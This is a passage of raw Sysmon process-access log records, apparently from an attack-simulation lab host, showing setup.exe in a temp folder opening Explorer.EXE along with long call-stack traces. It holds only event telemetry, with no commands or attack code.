mp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa